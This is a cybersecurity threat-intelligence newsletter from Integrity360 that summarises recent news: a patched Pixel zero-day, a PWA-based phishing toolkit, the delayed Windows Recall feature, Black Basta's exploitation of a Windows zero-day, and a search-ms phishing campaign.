Content
01. News Bites
-
Patch released for exploited zero-day on Google Pixel devices
-
Progressive Web Apps utilised by new phishing toolkit
-
Microsoft delays windows recall feature
-
Windows Zero-days exploited by Black Basta ransomware group
-
Windows search protocol exploited in phishing campaign
02. Conclusion
Patch released for exploited zero-day on Google Pixel devices
Google has patched a high-severity zero-day vulnerability, CVE-2024-32896, in Pixel devices, which was actively exploited in targeted attacks. The flaw, an elevation of privilege issue, has been fixed in the June update (Android 14 QPR3) for Pixel devices and will be addressed in other Android devices with future updates. Google also resolved 49 other security issues, including critical privilege escalation vulnerabilities. Users are advised to update their devices promptly to mitigate potential risks.
Progressive Web Apps utilised by new phishing toolkit
A new phishing toolkit leverages Progressive Web Apps (PWAs) to create convincing fake login forms for stealing credentials. Developed by a security researcher known as mr.d0x, this toolkit exploits PWAs' ability to mimic desktop applications, complete with fake address bars displaying legitimate URLs. Users are tricked into installing these malicious PWAs, which then prompt them to enter sensitive information. This method, which integrates seamlessly with operating systems, poses a significant threat due to its deceptive nature and potential for widespread abuse.
Microsoft delays windows recall feature
Microsoft has postponed the release of its AI-powered Windows Recall feature due to privacy and security concerns. Originally set to launch on June 18 with Copilot+ PCs, it will now undergo further testing within the Windows Insider Program. The feature, which captures and analyzes screenshots to facilitate data search, has raised alarms among privacy advocates and cybersecurity experts who fear it could be exploited for data theft. Microsoft has committed to enhancing its security before a broader release.
Windows Zero-days exploited by Black Basta ransomware group
The Black Basta ransomware gang has been linked to attacks exploiting a Windows zero-day vulnerability (CVE-2024-26169), a high-severity issue in the Windows Error Reporting Service. This flaw, patched in March 2024, allows attackers to gain SYSTEM privileges. Symantec reports that the gang used this vulnerability before the fix, deploying exploit tools shortly after initial infections by the DarkGate loader. This highlights Black Basta's advanced tactics and the critical need for timely updates to mitigate such threats.
Windows search protocol exploited in phishing campaign
A recent phishing campaign exploits the Windows search protocol (search-ms URI) to deliver malicious scripts. Attackers use HTML attachments in emails to trigger Windows searches that retrieve malicious files from remote servers. These files, often disguised as invoices, prompt users to execute batch scripts, potentially leading to malware infections. To mitigate this threat, users are advised to avoid opening unexpected HTML attachments and consider disabling the search-ms protocol to prevent abuse.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.
Disclaimer
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.